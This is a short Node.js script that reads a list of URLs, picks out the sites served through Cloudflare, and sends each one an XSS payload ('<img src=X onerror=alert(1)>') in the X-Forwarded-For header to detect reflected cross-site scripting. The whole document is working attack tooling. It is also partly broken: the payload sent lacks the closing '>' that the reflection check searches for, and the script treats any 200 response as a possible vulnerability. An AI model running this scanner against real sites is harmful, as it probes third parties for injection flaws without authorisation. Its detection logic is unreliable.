const axios = require('axios');
var fs = require('fs');

// npm install axios
// to run it: node file.js file.txt

// Target server's name may be different from cloudflare
// Which means we can miss some vulnerabilities

const array = fs.readFileSync('file.txt', 'utf8').split('\n');
const cloudflare = []

const checkServerName = (servername,main) => {
    if(servername == 'cloudflare' || servername == 'CLOUDFLARE' || servername == 'Cloudflare'){
        cloudflare.push(main)
    }
}

const firstOne = () => {
    for(i in array){
        axios.get(array[i]).then(re => {
            checkServerName(re.headers.server, re.config.url)

        }).catch(err => {
            console.log(`error occured`)
        })
    }
}

firstOne()


setTimeout(() => {
    send()
}, 2000);


const checkReflection = (rdata,url) => {
    if(rdata.includes("<img src=X onerror=alert(1)>")){
        console.log(`XSS  found on ${url}`)
    }
}


function send(){    
    for(let i=0; i < cloudflare.length; i++){
        axios.get(cloudflare[i], {headers: {"x-forwarded-for":"'><img src=X onerror=alert(1)"}}).then(resp => {
            if(resp.status === 200){
                console.log(`Possible vuln: ${resp.config.url.split("https://")}`);
            }
            checkReflection(resp.data,resp.config.url)
        }).catch(e => {
            if(e){
                console.log(`Forbidden header => ${cloudflare[i]}`)
            }
        })
    }  
}